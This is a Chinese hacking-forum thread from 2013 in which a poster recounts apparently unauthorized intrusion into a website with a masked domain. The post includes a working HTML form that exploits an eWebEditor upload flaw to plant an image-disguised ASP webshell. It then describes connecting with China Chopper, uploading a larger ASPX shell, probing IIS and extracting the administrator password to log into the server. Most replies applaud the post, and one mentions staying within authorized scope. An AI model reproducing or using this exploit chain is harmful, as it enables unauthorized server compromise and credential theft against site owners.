好吧 年前最后一站
目标站
扫目录扫出了一个
然后百度了一下 ewebeditor漏洞
利用以下代码 保存为1.html
<FORM encType=multipart/form-data method=post name=myform action=http://www.xxxx.cn/admin/ewebeditor/asp/upload.asp?action=save&type=image&style=popup&cusdir=Mr.DzY.asp>
<Input style="WIDTH: 510px; HEIGHT: 18px" size=85 type=file name=uploadfile>
<Input value=upload type=submit> <BR></FORM
打开
1.html
上传一个图片合成马或是免杀小马(不然会出现乱码)
成功后看源文件
得到路径
http://www.xxxx.cn/uploadfile/Mr.DzY.asp/20130207021537820.jpg
菜刀连接
传大马就不用说了 用ASPX马探测IIS
然后登陆服务器
结束 过年了大家好好过年 多陪陪家人 明年我们继续 传错图了 ...这个网站是我发出去的啊:funk::funk::funk: 你是孤风? 还是他发给别人了:L 楼上的亮点啦。。。 擦= = 传大马就不用说了 用ASPX马探测IIS 怎么就没了... 冰刀 发表于 2013-2-8 23:06 static/image/common/back.gif
擦= = 传大马就不用说了 用ASPX马探测IIS 怎么就没了...
直接探测出administrator的密码来了
Re: 好吧 年前最后一站
感谢分享这个实战案例,过程写得很清楚,ewebeditor的漏洞利用方式确实是经典的老问题了。年前还能坚持搞技术研究,精神可嘉。 也祝你新年快乐,多陪陪家人,明年继续一起进步!Re: 好吧 年前最后一站
感谢分享实战思路,ewebeditor的漏洞利用确实经典,图片马过检测那段也很实用。过年了,安全不忘,祝楼主和家人们新年快乐,明年继续搞技术交流!Re: 好吧 年前最后一站
感谢分享这个实战案例,步骤写得很清楚,ewebeditor的漏洞利用确实是经典的老问题了。不过提醒一下,这类操作请务必在授权范围内进行,避免触碰法律边界。另外,过年了,也祝你新年快乐,好好休息,多陪陪家人,明年再战!
页:
[1]